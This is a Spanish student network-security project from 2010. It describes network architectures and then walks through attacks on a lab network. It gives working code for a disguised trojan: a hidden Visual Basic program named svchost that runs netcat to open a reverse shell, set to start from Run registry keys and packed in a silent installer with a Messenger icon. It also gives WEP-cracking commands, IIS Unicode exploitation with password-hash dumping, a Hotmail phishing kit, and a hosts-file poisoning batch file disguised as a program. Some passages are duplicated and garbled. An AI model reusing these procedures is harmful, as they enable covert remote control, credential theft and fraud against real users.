proyecto: seguridad en redes informáticas
TRANSCRIPT
Seguridad de redes informáticas
Fecha: 25/05/2010 Creado por: Iván Pérez Pau Sabaté Tutor: Francesc Pérez Pedro Porcuna Proyecto de síntesis
2
1. Introducción ............................................................................................................. 2
2. Situación inicial ....................................................................................................... 4
3. Objetivos ................................................................................................................... 4
4. Seguridad de redes informáticas ............................................................................. 6
4.1 Arquitecturas de red ...................................................................................... 6 4.1.1 Servidores replicados .................................................................................... 6 4.1.2 Servidores VPN ............................................................................................ 7 4.1.3 Red Estándar ................................................................................................. 8 4.1.4 DMZ ............................................................................................................. 9 4.1.5 Red Doméstica ............................................................................................ 10
4.2 Implementar ataques y vulnerabilidades ................................................... 11 4.2.1 MSN Portable ............................................................................................. 11 4.2.2 Conseguir claves web ................................................................................. 23 4.2.1 Ataque UNICODE ...................................................................................... 32 4.2.1 Phishing ...................................................................................................... 52 4.2.2 Suplantación de identidad ........................................................................... 57 4.2.1 DNS Spoofing ............................................................................................ 74
4.3 Seguridad ....................................................................................................... 78 4.3.1 Conceptos de seguridad ........................................................................... 78 4.3.1.1 Autentificación: ...................................................................................... 78 4.3.1.2 Confidencialidad: ................................................................................... 78 4.3.1.3 Integridad: ............................................................................................... 79 4.3.2 Arquitecturas DMZ .................................................................................. 81 4.3.2.1 Firewall ................................................................................................... 82 4.3.2.2 Proxy ....................................................................................................... 83 4.3.2.3 IDS .......................................................................................................... 85 4.3.2.4 IPS .......................................................................................................... 86 4.3.3 VPN ............................................................................................................ 88
5. Resultados .............................................................................................................. 90
6. Conclusiones y líneas futuras ............................................................................... 94
7. Anexo ..................................................................................................................... 96
7.1 Configuración del firewall ........................................................................... 96
7.2 Manual IPcop .............................................................................................. 113
8. Glosario ................................................................................................................ 130
1. Introducción
3
En este trabajo, pretendemos dar una visión profunda de los principales problemas de seguridad que existen en las redes de hoy en día. Internet, es la mayor red que existe, la cual en los últimos años ha evolucionado considerablemente y cada vez más personas, utilizan esta poderosa herramienta en su día a día, sea para trabajar, para estudiar, como ocio… Cada vez son más las actividades que podemos realizar gracias a internet: comprar sin salir de casa, comunicarnos sin utilizar teléfono con cualquier parte del mundo, manejar nuestras cuentas bancarias sin salir de casa…pero no todo son ventajas, ya que, como dice el refrán: “Hecha la ley, hecha la trampa”. Es posible que descubran nuestras contraseñas del banco…que se hagan pasar por nosotros con nuestro correo…y ese tipo de problemas son los que vamos a presentar en este trabajo. Nosotros, lo hemos enfocado más a nivel empresarial y no a una red doméstica, ya que la información verdaderamente interesante que atrae a los hackers se encuentra en las empresas. No puedes asegurar que un sistema sea impenetrable, pero al menos, nos aseguraremos de que si alguien quiere entrar, lo tenga bastante difícil. El objetivo principal del trabajo es explicar cuáles son los peligros más frecuentes en internet y cómo podemos remediarlos. Luego, como objetivos secundarios nos gustaría entender cuál es el origen de estos peligros (fallos de programación…) y ponernos en la piel de un hacker implementando algún que otro ataque a una red montada por nosotros mismos. Una vez fijados nuestros objetivos, empezaremos por describir la situación inicial en la que nos encontramos (Que conocimientos tenemos actualmente, que podemos hacer…) para así, leer este escrito al final del trabajo y poder hacer un balance de lo que sabíamos antes del trabajo, y lo que sabremos después de realizarlo. A continuación, describiremos las etapas del trabajo que iremos realizando con el tiempo que proporcionado, asistiendo a horas de consulta con el Profesor Francesc Pérez que será quien nos guie en este trabajo.
4
2. Situación inicial
Bien, nos encontrados es segundo de ESI y poseemos una serie de conocimientos de redes ya que en este curso tenemos la asignatura de internet y el año pasado hicimos redes. El año pasado, fundamentalmente lo que vimos en redes fue, de forma teórica, las tipologías de red, como por ejemplo, en forma de árbol, tipología anillo (Token ring), tipología lineal, etc… También dimos unas pequeñas pinceladas de lo que era el modelo OSI, cuáles eran sus capas, quienes eran los desarrolladores... pero insistimos, todo esto fueron clases teóricas. Otro punto que dimos, fueron los dispositivos hub, switch y router. Aprendimos que eran, y de qué forma se comportaban cada uno de ellos dentro de una red. Este año, en la asignatura de internet, además de clases teóricas, también hemos hecho implementaciones, en máquinas virtuales... Hemos vuelto a tocar la capa OSI, pero esta vez la hemos estudiado profundamente, y además hemos aprendido el modelo de internet, analizando también sus 4 capas. Nos hemos centrado en los routers, y hemos hecho prácticas de configuración de routers cisco y la creación de redes virtuales utilizando un programa llamado “Packet Tracer”. Por lo tanto, se podría decir que sabemos crear una red básica, con varios router, varios switches y sus correspondientes ordenadores. En internet, también hemos aprendido el funcionamiento de los protocolos más importantes, como DNS, DHCP...y hemos instalado un servidor de cada uno de ellos en maquinas virtuales para ver de qué manera se comportan y que paquetes envían y reciben. Otra de las prácticas, fue utilizar telnet y ssh, poniendo un sniffer llamado “ettercap” a la escucha y pudiendo observar que descubrir una comunicación sin encriptarse como telnet estaba al alcance de cualquiera mientras que desencriptar paquetes mandados por ssh era prácticamente imposible. Los conocimientos generales que tenemos son teóricos de funcionamientos de protocolos, no hemos realizado ningún ataque ni se nos ha explicado nada sobre ello. Tampoco hemos trabajado el funcionamiento de dispositivos que no sean los tres nombrados anteriormente (router, hub y switch). En este trabajo pretendemos consolidar los conocimientos adquiridos y también ampliarlos, como por ejemplo aprender a utilizar firewalls, Ids, Ips...y estudiar las vulnerabilidades que tienen los protocolos más usados en internet.
3. Objetivos
5
Como objetivos del trabajo pretendemos conocer todos los dispositivos hardware y software que se pueden utilizar en la arquitectura de una red y saber cuáles de ellos utilizar según las necesidades de esta red. Esto quiere decir, por ejemplo, que si a nosotros nos piden una red para 300 personas y nos dan un presupuesto, tenemos que barajar las diferentes opciones para esta red y elegir la más segura para ese caso. También nos gustaría, aunque fuese muy por encima, configurar un proxy y un firewall y ver cómo reacciona y que posibilidades de configuración nos da. Para ello buscaremos sistemas gratuitos de Unix que podamos instalar en cualquier ordenador. Lo más importante en una red, es la seguridad, por lo tanto también tendríamos que conocer a que se deben los problemas de seguridad, que suelen ser fallos de programación, y una vez detectado el problema, diseñar una arquitectura donde el ataque quede obsoleto. Por ejemplo, si implementamos un ataque donde un virus envíe peticiones de descargas, utilizar un proxy para que estos paquetes no lleguen a ninguna parte. Otro de los objetivos es la implementación de una serie de ataques utilizando ordenadores conectados entre ellos con un cable cruzado. Con estas prácticas aprenderemos como ejecutar el ataque y una vez quede demostrado que existe una vulnerabilidad, plantearemos la solución de esta misma, para que si volvemos a realizar el ataque se demuestre que ya estamos protegidos.
6
4. Seguridad de redes informáticas
4.1 Arquitecturas de red
4.1.1 Servidores replicados
Esta arquitectura se basa en que los diferentes servidores de las oficinas se vayan transfiriendo la información entre ellos a través de internet a tiempo real. Es una red muy costosa, pero proporciona mucha velocidad, seguridad y agilidad a los usuarios. Además, si estas oficinas se han de ampliar y se hace necesario poner un servidor más, la configuración de este no es nada complicada y le facilita mucho el trabajo al administrador de red.
7
4.1.2 Servidores VPN
Esta arquitectura está hecha para la comunicación Segura entre servidores, mediante una VPN. Los servidores se conectan mediante una conexión que esta encriptada, y dificulta que la lectura de los paquetes sea más complicada. Montar esta red es menos costoso que la anterior, pero mucho más complejo de configurar. Además es menos rápida y en caso de tener que añadir un nuevo servidor, estableciendo la comunicación provocaríamos la sobrecarga del que estuviese en medio.
8
4.1.3 Red Estándar
Esta es una de las redes más comunes en las empresas pequeñas, ya que sólo tiene pocos departamentos formados por un pequeño grupo de ordenadores. Al igual que todas, tienen que estar protegidas por un firewall después del router. Es una de las más comunes ya que es simple y fácil de instalar y en muchas oficinas pequeñas no es necesario montar ningún otro sistema de seguridad.
9
4.1.4 DMZ
Esta arquitectura nombrada DMZ, consta de una red normal más una zona desmilitarizada, con un servidor aparte de la red de usuarios. Esto hace que aumente considerablemente la seguridad en la red, ya que si alguien puede conseguir acceso a la DNZ, donde se encuentran los servidores, la red de usuarios seguiría estando segura. Esta arquitectura se implementa si además de la típica LAN de usuarios es necesaria la instalación de un servidor FTP, web, Base de datos, etc…
10
4.1.5 Red Doméstica
Esta red es la más común en los hogares, ya que no es necesario establecer tanta seguridad en nuestras redes domésticas. Nos conectamos directamente a internet con un dispositivo que nos hace de Router (Enruta los paquetes), modem (convierte señal telefónica en ADSL), switch (podemos conectar varios PC por cable) y además incorpora un pequeño firewall. También hay algunos que tienen incorporado un punto de acceso.
11
4.2 Implementar ataques y vulnerabilidades
4.2.1 MSN Portable
Escenario del ataque:
En este ataque utilizaremos dos herramientas de red para hacernos con el control complete de una máquina. Una de ellas se llama netcat, que és una herramienta que te permite establecer una Shell remota de otra máquina. Y la otra es TighVNC. Un cliente-servidor VNC con una característica añadida. Este programa se puede controlar desde la consola de comandos. Observemos las opciones que nos proporciona el netcat.
12
Ahora nos instalaremos TighVNC, cliente y servidor. Iremos a la carpeta donde se nos ha instalado y cogeremos los dos únicos archivos que son necesarios para que el cliente pueda establecer una conexión con el servidor.
Si ejecutamos el cliente en nuestra máquina, nos daremos cuenta que aparece un icono en la barra de tareas. Este icono hay que ocultarlo ya que la víctima se podría dar cuenta de lo que está pasando fácilmente. Configuraremos el cliente en nuestra máquina tal y como queremos que quede en el ordenador de la víctima. Podemos poner password, resolución de la pantalla alta, baja…y todos estos atributos quedaran guardados en el registro de Windows en la siguiente ubicación:
13
La opción para esconder el icono de la barra de herramientas NO es configurable en las opciones que el programa trae por defecto, pero lo podemos conseguir agregando la siguiente clave en el registro y estableciéndole el valor “1”:
14
Cuando ya lo tenemos todo listo y bien configurado exportaremos todo el registro a un archivo para que este, sea luego añadido en el ordenador que queramos controlar. Para guardar el registro pulsaremos “botón derecho�Exportar:
Yo lo guardaré con el nombre de reg.reg:
15
Si abrimos el archivo con un bloc de notas veremos esto:
Para establecer conexión con el ordenador de la víctima tenemos que saltarnos el firewall que tiene integrado el router. Esto sería mediante una conexión directa en la cual nosotros nos conectaríamos a la víctima. Para evitar el problema del firewall, nosotros utilizaremos conexión inversa, en la cual el pc de la víctima será quien se conecte a nosotros. Cada cierto tiempo, la aplicación netcat irá enviando peticiones de conexión a nuestro servidor. En este caso la ip del servidor será la 169.254.2.2 y utilizaremos el puerto 6000 para la conexión. Por lo tanto tendríamos que abrirlo en nuestro router y firewall. También tendremos en cuenta que los archivos los extraeremos en Archivos de programa�Windows Messenger. Para que netcat envíe peticiones a nuestro servidor cada cierto tiempo, hemos creado una aplicación en visual basic con dos timers y el siguiente código:
Private Sub Form_Load() App.TaskVisible = False Timer1.Enabled = True Timer2.Enabled = True Form1.Visible = False End Sub Private Sub Timer1_Timer() Shell "\..\..\Archivos de programa\Windows Messenger\nc -d -e cmd.exe 169.254.2.2 6000" End Sub Private Sub Timer2_Timer()
16
Shell "\..\..\Archivos de programa\Windows Messenger\nc -d -e cmd.exe 169.254.2.2 6000" Timer2.Enabled = False End Sub
Para crear el ejecutable le daremos el nombre de un proceso habitual de Windows para camuflarlo.
Ya tenemos todo lo necesario para controlar una máquina remotamente, solo nos falta poner en marcha todo esto que hemos montado. Para añadir el archivo reg.reg en el registro de la máquina, y añadir dos registros para que el programa compilado por nosotros en visual basic y el winvnc se ejecuten al inicio de Windows crearemos el siguiente archivo.bat. Además añadiremos el código que hará que los dos programas también se ejecuten tras la extracción.
17
REGEDIT /S vnc.reg reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "winVNC" /d "C:\Archivos de programa\Windows Messenger\WinVNC.exe" reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /d "C:\Archivos de programa\Windows Messenger\svchost.exe" @echo off start winvnc.exe start svchost.exe Exit Ahora comprimiremos todos estos archivos con el winrar, y haremos que sea autoextraíble. Método de compresión� la mejor: esto solo para que el archivo ocupe lo menos posible.
Iremos a la pestaña avanzado y pulsaremos en Autoextraíble para que se nos habrá un nuevo menú de opciones.
18
Pondremos la carpeta de extracción. Los caracteres \..\..\ harán que la extracción funcione teniendo asignada cualquier letra como partición del sistema. Después de la extracción ejecutaremos el .bat que hemos creado.
Una vez ejecutado, este fichero ya no lo querremos así que lo podemos eliminar.
19
En modos marcaremos las opciones ocultar todo y sobrescribir todos los ficheros. Esto se hará para que la víctima no vea nada de la instalación y por si ejecuta el archivo varias veces que no le aparezca ningún error ni nada de sobrescribir archivos.
Para que no se vea que es un archivo comprimido, le pondremos un icono igual que el de Windows Messenger.
20
Y ya creamos el archivo comprimido. Nos quedará así:
Cuando se ejecute el archivo en el PC de la víctima le aparecerán los siguientes archivos y los siguientes registros serán añadidos. El no se dará cuenta de nada.
21
Ahora solo tenemos que poner el netcat a la escucha en nuestro ordenador. Para más comodidad copiaremos esta librería en c:\Windows\system32 para poder ejecutarlo sin tener que ir a la ubicación en la que está.
Aquí recibimos la conexión. Ahora ya estamos controlando la Shell de la máquina de la víctima.
22
Si queremos ver la pantalla de la víctima en directo, pondremos nuestro cliente VNC a la escucha pulsando listen mode.
Y desde la Shell de la víctima ejecutaremos el comando que hará que se conecte a nuestro PC:
El resultado obtenido es el siguiente:
23
4.2.2 Conseguir claves web
Escenario:
24
Lo primero que haremos antes de realizar el ataque será comprobar la configuración de las interfaces de red activas. Para ello utilizaremos el programa ifconfig.
Luego utilizaremos el programa iwconfig. Es muy similar al ifconfig, pero este está orientado a interfaces inalámbricas. Se utiliza para establecer parámetros específicos de conexiones inalámbricas. iwconfig: Nos mostrara las interfaces inalámbricas que tenemos configuradas.
25
Ahora empezaremos el ataque, primero hay que poner alguna interface en modo monitor. Para ello seguiremos el siguiente procedimiento: Si tenemos desactivada la interface del adaptador con el cual queremos realizar la auditoría, la activaremos con el siguiente comando: ifconfig wlan0 up
Ahora, a partir de esta crearemos una nueva interface la cual estará en modo monitor. Para ello utilizaremos airmon-ng con el siguiente comando. airmon-ng start wlan0
26
El nombre asignado a nuestra nueva interface es “mon1”. Bien, esta interface tendrá la misma mac que wlan0, detalle que nos puede delatar. Para impedirlo cambiaremos la mac de la interface. Recordamos que para cambiar la configuracion de una interface, esta, debe estar desactivada. La desactivaremos de la siguiente manera: ifconfig mon1 down Y ahora, con el programa macchanger cambiaremos la mac. macchanger -m 00:11:22:33:44:55 mon1
Una vez realizada la operación, volveremos a levantar la interface para poder usarla. ifconfig mon1 up
27
Ahora elegiremos una red víctima. Para ver las redes utilizaremos el programa airodump-ng: airodump-ng mon1
Asi nos saldrá un listado con todas las redes inalámbricas localizadas. Nosotros debemos elegir cuál de ellas nos gustaría atacar y apuntar su canal, su dirección mac para poder seguir realizando el ataque. control-c (Para parar el airodump) Ahora volveremos a la captura de paquetes centrándonos solamente en el canal 6. También podríamos centrar la captura de una mac pero al no haber muchas redes en este canal no es necesario hacerlo. airodump-ng mon1 –w WLAN_9A -c 6 (lo dejas capturando)
28
Ejecutaremos esa orden donde en el parámetro –w indicaremos el nombre del archivo en el cual se vayan a guardar los paquetes capturados y en la opción –c, elegiremos el canal a capturar. Bien, ahora debemos autentificarnos con el router para que este crea que formamos parte de su red habitual. Lo haremos utilizando el programa aireplay-ng. aireplay-ng -1 0 -e (Nombre red) -a (mav víctima) -h (nuestra dirección mac) mon1 aireplay-ng -1 0 -e WLAN_9A -a 00:13:F7:1D:B6:CF -h 00:23:cd:bb:0b:fb mon1
Los paquetes de la red se irán capturando, pero para acelerar este proceso inyectaremos nuestros propios paquetes a la red.
29
aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon1
Aquí podemos observar que la captura de paquetes crece gracias a la inyección.
30
Una vez capturados los paquetes necesarios, solo tenemos que utilizar aircrack para desencriptar la clave utilizando el fichero donde habíamos guardado las capturas previamente. aircrack-ng WLAN_9ª-01.cap Al ejecutar este comando nos saldrá una lista de redes, tenemos que seleccionar mediante un número la red que hemos estado atacando. En este caso utilizaremos el número 1.
En unos segundos obtendremos nuestra clave wifi.
31
32
4.2.1 Ataque UNICODE
Escenario:
En este ataque, aprovecharemos un fallo de programación en el programa IIS 5.0 para poder acceder a un sistema Windows 2000 server. Una vez realizado el ataque mediante este bug llamado Unicode, procederemos a aprovechar este método para transferir y ejecutar archivos en la máquina víctima. Primero, usaremos un programa llamado N-Stealth con el cual podemos escanear un rango de hosts. El programa nos mostrará información sobre estos hosts, tanto programas instalador como posibles bugs de estos mismos. En estas capturas veremos que el programa va capturando información. Cuando acaba, nos muestra en un documento .html toda la información que ha encontrado incluyendo los posibles bugs.
33
34
El programa nos ha encontrado el bug “Unicode ISS”. Este fallo permite ejecutar comandos y/o programas en el servidor remotamente. El fallo consiste en que el programa logra reproducir los caracteres "/" y "\" escritos en el navegador como si se tratase de un directorio local y así podemos introducirnos en la máquina víctima. Para que el programa reconozca estos caracteres, los representamos mediante caracteres UNICODE (Representación hexadecimal de su valor ASCII precedido de un símbolo %). En este caso nos introducimos en la carpeta system32 para abrir cmd.exe y ejecutar un dir del disco duro local C:\.
35
Esto ha sido ejecutado desde un equipo con Windows xp cuya ip es 192.168.1.40 introduciéndonos en el equipo víctima: 192.168.1.39. En este pantallazo comprobamos que la información que nos ha proporcionado anteriormente el navegador es correcta. Pantallazo desde Windows 2000:
36
Ahora exploraremos la carpeta inetpub\scripts del servidor. El pantallazo nos indica que esta vacía.
Comprobamos si esto es cierto mirando el servidor y vemos que sí.
Pretendiendo obtener más información sobre esta red en la cual nos hemos infiltrado ejecutaremos un ipconfig /all y net view desde nuestro navegador.
37
Los resultados mostrados son correctos. Ahora exploraremos que archivos compartidos existen en esta máquina.
38
Según el navegador, la carpeta Mis Documentos esta compartida. Miramos si es cierto en el servidor. Efectivamente en nuestro servidor tenemos esta carpeta compartida.
Una vez hemos llegado aquí, tenemos bastante información sobre la red en la cual hemos conseguido penetrar. Ahora utilizaremos una herramienta llamada SolarWinds TFTP Server.
Para poner el programa en funcionamiento le tenemos que dar a FileStart. El programa nos pedirá que creemos la ruta para guardar los ficheros, si queremos usar la predeterminada tendremos que crear la carpeta.
Utilizando este programa podemos introducir y extraer archivos entre nuestra máquina y el servidor. Podríamos enviNosotros hemos decidido utilizar una herramienta llamada netcat para proceder al ataque. Esta herramienta es muy fácil de usar y nos permitirá disponer de una shell remota de la máquina víctima.Nos descargamos esta herramienta y la enviamos al servidor. Se nos quedara en la carpeta scripts.
39
Para poner el programa en funcionamiento le tenemos que dar a File�Options y pulsar
El programa nos pedirá que creemos la ruta para guardar los ficheros, si queremos usar la predeterminada tendremos que crear la carpeta.
Utilizando este programa podemos introducir y extraer archivos entre nuestra máquina y el servidor. Podríamos enviar y ejecutar cualquier troyano o cualquier programa. Nosotros hemos decidido utilizar una herramienta llamada netcat para proceder al ataque. Esta herramienta es muy fácil de usar y nos permitirá disponer de una shell remota de la máquina víctima.
cargamos esta herramienta y la enviamos al servidor. Se nos quedara en la
Options y pulsar
El programa nos pedirá que creemos la ruta para guardar los ficheros, si queremos usar
Utilizando este programa podemos introducir y extraer archivos entre nuestra máquina y ar y ejecutar cualquier troyano o cualquier programa.
Nosotros hemos decidido utilizar una herramienta llamada netcat para proceder al ataque. Esta herramienta es muy fácil de usar y nos permitirá disponer de una shell
cargamos esta herramienta y la enviamos al servidor. Se nos quedara en la
40
Ahora, ejecutaremos la herramienta introduciendo los parámetros precisos. Los espacios serán expresados mediante el signo “+”. Especificamos que la conexión se realice mediante el puerto 80, que se quede en modo listening (esperando conexión entrante) y que después de la conexión se ejecute el programa cmd.exe
Una vez ejecutado el comando no nos cargará ninguna página, pero se habrá ejecutado. Solo nos queda, desde la máquina del atacante ejecutar el siguiente comando para realizar la conexión. Cabe recordar que lo deberemos ejecutar desde la carpeta que contenga el archivo netcat.exe. La sintaxis es: nc [ipvíctima] [puerto]
41
Recibimos el mensaje el cual demuestra que hemos establecido conexión con la máquina, ahora tenemos su shell para movernos por su sistema.
Demostramos que el contenido que muestra la shell remota es totalmente real.
42
Ahora iremos a por las contraseñas de administrador. Utilizaremos el programa llamado pwdump3. Lo primero que tenemos que hacer es enviar al servidor los archivos que queremos utilizar para el ataque. Para ello pondremos estos archivos en la carpeta c:\THTP-Root y los enviaremos igual que hemos enviado el netcat anteriormente.
43
Miramos que los archivos se hayan transferido.
44
Observamos el log del TFTP Server donde nos dice todo lo enviado.
Una vez hemos hecho esto ejecutaremos la siguiente orden para que el programa almacene en un archivo de texto toda la información de usuarios y contraseñas que haya en el sistema. El archivo se guardará en la ruta especificada, en este caso c:\inetpub\scripts\sam3.txt
45
Observamos que el archivo de texto se ha creado correctamente. Examinados el contenido y vemos que esta todo encriptado.
Para desencriptarlo, nos lo traeremos a nuestro ordenador.
46
Vemos que podemos observa el mismo contenido. El archivo se ha transferido correctamente. Ahora intentaremos desencriptar el documento. Para ello utilizaremos el programa llamado LC versión 5. Le daremos a Import, escogeremos la opción From PWDUMP file y examinamos el documento que nos hemos traído del servidor.
47
El programa nos indica que no hay ningún password en la máquina atacada.
Para comprobar que podríamos desencriptar el password, le pondremos una contraseña al administrador del servidor.
Volvemos a capturar el archivo con la información y lo
Ejecutamos el programa he importamos el mismo archivo con las mismas opciones marcadas.
48
Volvemos a capturar el archivo con la información y lo traeremos a nuestro ordenador.
Ejecutamos el programa he importamos el mismo archivo con las mismas opciones
traeremos a nuestro ordenador.
Ejecutamos el programa he importamos el mismo archivo con las mismas opciones
49
Ahora nos muestra que el usuario Administrador dispone de un password.
Pulsamos play, y el programa empieza a descifrar la contraseña ha “fuerza bruta”: El programa probará combinaciones de texto hasta que de con la correcta. En esta captura nos dice que quedan 3 horas aproximadamente para poder descifrar todas las contraseñas existentes. Observemos que ya ha encontrado la última letra de la pass.
50
A los 20 minutos testeando contraseñas ha conseguido encontrar la correcta:
51
Ya disponemos de control total sobre la máquina. Aquí demostramos que podemos navegar desde msdos en búsqueda de archivos interesantes y transferídnoslos a nuestro ordenador.
52
4.2.1 Phishing
El ataque phishing (pesca en español) consiste en hacerse pasar por una persona o empresa para conseguir información y poder estafar a la víctima. Phisher (el estafador) suele interesarse por passwords y nombre de usuario. Una de las estafas más comunes es hacerse pasar por una cuenta de correo y pedir datos de confirmación al cliente. El phishing está bastante ligado a la ingeniería social. Combinando los dos ataques conseguimos cuentas de bancos, redes sociales (facebook, twitter, etc…). En esta implementación de phishing hemos copiado una página web. En este caso la página web de Hotmail, para así poder obtener el usuario y la contraseña de un cliente de Hotmail. Es una página web con un código html y php para la extracción de datos. (Este por ejemplo es una versión de Windows Live anterior a la actual).
53
La creación Dentro de la carpeta del Scam del Hotmail live, vemos diferentes archivos. La creación de la página web esta en código html para el diseño junto con php. Estos dos archivos están enlazados entre sí, analizando los archivos, vemos que el html es el que tiene todo el diseño de la web junto con una carpeta donde guarda todas las imágenes. Por otra parte tenemos el archivo Php que este se encarga de recoger las variables ( Id y Contraseña ) y las envía a un documento de texto.
Analizando la pagina web para comprobar cada tozo de la página, contamos con un plugin llamado Firebug. Con este, vemos cada trozo de código de la página web, tiene una herramienta que con el cursor marcas las parte que quieres ver de código y te lo muestra todo debajo. Por ejemplo marcando el campo ID, vemos cómo está programado el cuadro de texto.
54
Campo ID: <input type="text" class="cssTextInput" style="" value="" autocomplete="off" maxlength="113" name="login"> Campo Contraseña: <input type="password" class="cssTextInput" style="" autocomplete="off" maxlength="16" name="passwd"> Botón Iniciar sesión: <input type="submit" class="cssBtn" value=" Iniciar sesión " name="SI" id="idSIButton9" style="background-image: url("http://login.live.com/pp500/images/btnbkgnd_hot.gif");">
Y después de haber enviado estos dos campos a un documento de texto, que re direccione otra vez a la página web real de Hotmail para evitar una sospecha al cliente, y así hacer como si hubiera sido un error de la propia página web. Principalmente teníamos planteado que una vez tenga los campos registrados en el documento de texto, enviara los datos a la página real de Hotmail. Pero por temas de seguridad, los campos tienen una variable de números que va cambiando aleatoriamente, y es casi imposible insertar los campos. La publicación
55
Seguidamente para que esta página funcionara, nos registramos a un hosting gratuito para “publicar” probar el phishing “la estafa”. Buscamos y encontramos un hosting llamado x10hosting donde dejaban almacenar hasta 500Mb lo suficiente para poder almacenar nuestra página web. Una vez registrados miramos el usuario y contraseña para crear una sesión FTP. Finalmente subimos los archivos al servidor del hosting mediante un gestor de archivos FTP, nombrado Filezilla, donde introduciendo nuestro usuario y contraseña de ftp proporcionado por el hosting, subimos los archivos. Y finalmente comprobar si introduciendo un usuario y una contraseña se guardan los campos en el documento de texto.
Código para el Bat Por otra parte creamos un archivo .bat , mediante un documento de texto simple, creamos el código para modificar un archivo del sistema en concreto el que se encuentre en C:\windows\system32\drivers\etc\hosts Este documento, es el encargado de direccionar todas las páginas web, es decir, direcciona de una IP a un nombre, por ejemplo ahora por defecto tenemos que sale 127.0.0.1 – localhost, estamos diciendo que esta ip es lo mismo que localhost. Si para esto le añadimos nuestra ip, y le decimos que es www.hotmail.com, cuando el usuario ponga en el navegador Hotmail.com, le re direccionará a nuestra página web.
56
Para esto hemos de hacer un fichero de .txt y añadir esta secuencia: @echo off echo 208.98.57.189 http//hotmail.com >>%windir%\System32\drivers\etc\hosts echo 208.98.57.189 www.hotmail.com >>%windir%\System32\drivers\etc\hosts echo 208.98.57.189 hotmail.com >>%windir%\System32\drivers\etc\hosts Con este código estamos diciendo que ponga en el archivo Hosts “printe” la IP 208.98.57.189 que sea www.hotmail.com y lo ponemos de todas las formas en que el usuario pueda entrar. Y finalmente convertirlo a un .bat que eso lo haremos manualmente cambiando la extensión. En conclusión este fichero sirve para que el usuario cuando ponga www.hotmail.com en el navegador le salga nuestra página web. Decoración del Bat Otro paso importante, para que el usuario pueda picar mejor, convertiremos el .Bat a . Exe, que será más fácil en que pique el usuario y se piense que es un programa cualquiera. Para eso lo aremos en diferentes pasos:
1. Convertir el Bat a exe:
57
En este paso, con un simple programa, convertiremos el archivo .bat a un ejecutable, Para esto añadimos el .bat al programa y que lo convierta en un ejecutable corriente.
2. Cambiar imagen del exe: Este paso sirve para que el usuario se piense que es un programa que él desea y no tenga rumores de abrirlo. Para eso con otro programa cambiaremos el icono que tiene por defecto el .exe, este paso es sencillo, consta de instalar otra vez un programa para que cambie el icono que lleva por defecto por otro que deseamos. Como por ejemplo el de Windows Messenger, y así el usuario se piense que estamos instalando el Messenger y en realidad está modificando el archivo hosts.
3. Pasarle el archivo a la victima
Por último hemos de conseguir pasarle el “instalador del programa” y que lo ejecute. Otra forma de utilización de este ataque seria la creación de una cadena de e-mails solicitando la confirmación de los datos de Hotmail para la creación de una nueva base de datos. Incluyendo en los e-mails que es de total urgencia y que se reenvíe a nuestros contactos lo antes posible.
4.2.2 Suplantación de identidad Este ataque consiste en crear una página web idéntica a una web verdadera para que la víctima la confunda y nos introduzca así sus datos que son de nuestro interés.
58
Para la implementación de este ataque, montaremos un punto de acceso en nuestra máquina local, y asociaremos a este un servidor DNS, DHCP y un servidor web. Desde el PC de la víctima, veremos una red wifi sin seguridad ninguna, por lo tanto la víctima se conectará sin la necesidad de introducir ningún password. Una vez conectada, podrá navegar por internet con normalidad, ya que con la configuración de nuestro DNS y DHCP habrá recibido toda la configuración necesaria para poder navegar sin problemas. Lo interesante del ataque está en el servidor DNS. Configuraremos este servicio de tal forma que tenga un registro el cual asocie la web de Hotmail a una web alojada en nuestro servidor de apache local para que se comporte de la siguiente manera: -Cuando la víctima realiza una búsqueda, el servidor local, lo primero que hará será buscar la resolución en sus registros. Si la encuentra contestará, y si no enviará la petición a otro servidor hasta encontrar la respuesta.
-Teniendo en cuenta esto, cuando la víctima quiera navegar por cualquier dirección web, nuestro servidor ara las consultas a servidores externos pero cuando introduzca la web de Hotmail, como él tiene un registro con esta información dará la respuesta sin buscarla en sitios externos.
IMPLEMENTACIÓN DEL ATAQUE
1. Montaje del servidor DHCP.Trabajaremos con dhcp3-server. Lo primero que haremos será instalarlo desde nuestro gestor de paquetes.
Ahora lo configuraremos. La configuración de este programa se encuentra en /etc/dhcp3/dhcpd.conf. Utilizaremos el programa ’nano’ para editar los archivos de texto. También podemos utilizar ‘gedit’.
59
Explicación del fichero de configuración: Ddns-update-style none � Define el método de actualización de los servidores DNS. Como nosotros configuraremos un DNS propio no nos interesa que el servidor lo actualice. Default-lease-time 60���� Especifica el tiempo (en segundos) que será mantenida una asignación de direcciones a no ser que el cliente especifique alguna en concreto. Max-lease-time 72���� Específica la cantidad máxima de tiempo (en segundos) que será mantenida una asignación de direcciones. Authoritative ���� Esta opción hará que el servidor de DHCP reasigne direcciones a los clientes mal configurados, incluyendo la nueva configuración del servidor. Log-facility local7���� Esta opción permite que los registro del DHCP se vaya almacenando en un log aparte y no en el syslog (log global del sistema). Esta es la configuración de direcciones de nuestro servidor:
-Indicamos la subred 10.0.0.1 con la máscara 255.255.255.0. -Indicamos que rango de ip a de asignar nuestro servidor. Asignara la
direcciones desde 10.0.0.33 hasta 10.0.0.254. -Indicamos el Gateway o puerta de enlace: 10.0.0.1 -Indicamos el servidos DNS que ha de asignar a los clientes. Como es uno local
igual que el DHCP el servidor DNS también se encontrara en nuestra ip: 10.0.0.1 Subnet 10.0.0.0 netmask 255.255.255.0 { Range 10.0.0.33 10.0.0.254 Option routers 10.0.0.1 Option domain-name-servers 10.0.0.1 }
60
El servidor DHCP ya está preparado. Normalmente ahora sería el momento de reiniciar este servicio para que se aplicaran los cambios, pero en este caso si lo hacemos ahora nos mostrará error ya que aun no está configurada ninguna interfaz para poder montar la subred 10.0.0.0. Ese error es normal, en el último paso veremos cómo solucionarlo.
2. Montaje del servidor DNS.
Primero de todo instalaremos el paquete del servidor DNS que queramos utilizar. En este caso usaremos bind9 el cual instalaremos mediante nuestro gestor de paquetes.
61
Primero editaremos una zona en el fichero /etc/bind/named.conf para que nos quede de la siguiente manera: Zone “www.hotmail.com” � Nombre de la zona. Type master � tipo de zona File “/etc/bind/db.hotmail” � Donde se encuentra el fichero de configuracion de esta zona.
62
Ahora crearemos este fichero de configuración. Lo aremos a partir del archivo /etc/bind/db.local que es el archivo predeterminado de las zonas de tipo master. Esto nos lo especifican en el archivo named.conf.default-zones:
Creamos db.hotmail a partir de db.local:
